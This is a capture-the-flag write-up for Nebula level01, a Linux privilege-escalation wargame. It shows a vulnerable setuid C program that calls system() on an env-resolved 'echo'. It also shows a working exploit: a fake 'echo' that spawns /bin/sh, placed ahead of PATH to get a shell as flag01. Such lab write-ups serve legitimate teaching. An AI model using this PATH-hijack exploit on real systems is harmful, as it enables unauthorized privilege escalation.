Nebula Level01 Write Up
Nebula is a wargame from Exploit Exercises about exploiting privilege escalation vulnerabilities on Linux.
This is my write up for the second level.
Overview
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.
This level provides the source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char \*\*argv, char \*\*envp)
{
gid\_t gid;
uid\_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
Write up
Two glaring things I noticed right away is the envp
variable being passed to main, and the system
function being called.
I knew that system
executes whatever command it’s given, but I was unfamiliar with envp
. After some googling, I found the GNU libc manual entry on it. In short, envp
is a way to access a process’ environment variables. It is a relic from older Unix systems. Today, the environ
is more common.
So how can these two things be combined to exploit the program? The program can be tricked to run exploit code instead of the echo
command.
Failed Attempt
My first attempt was to change the echo
command to do something else. So I tested to see if I could make echo
run ls.
export echo='ls'
echo ./
./
This of course did not work.
Solution
After some more googling I found this excellent resource from Hackers Hut:
_The C library call `system()` can be used to execute a system command from a C program. It calls `sh` with the given string as argument. For example, if one wants to send mail from a program, one might write_
_system("mail");_
_If a setuid root program would do this, it would be tricked immediately: the attacker would put his own executable `mail` in some directory, put that directory in front of the `PATH` and `system()` would invoke the attacker's executable. _
Now I know that I to need to write a malicious echo
binary and place it in front of PATH. This can be done in a few lines of C:
#include <stdlib.h>
int main() {
system("/bin/sh");
return 0;
}
Compile and test:
level01@nebula:~$ gcc /tmp/shell.c -o /tmp/echo
level01@nebula:~$ /tmp/echo
sh-4.2$ whoami
level01
Add to front of PATH:
level01@nebula:~$ export PATH=/tmp:$PATH
Finally, run the setuid binary:
level01@nebula:~$ /home/flag01/flag01
sh-4.2$ whoami
flag01
sh-4.2$ getflag
You have successfully executed getflag on a target account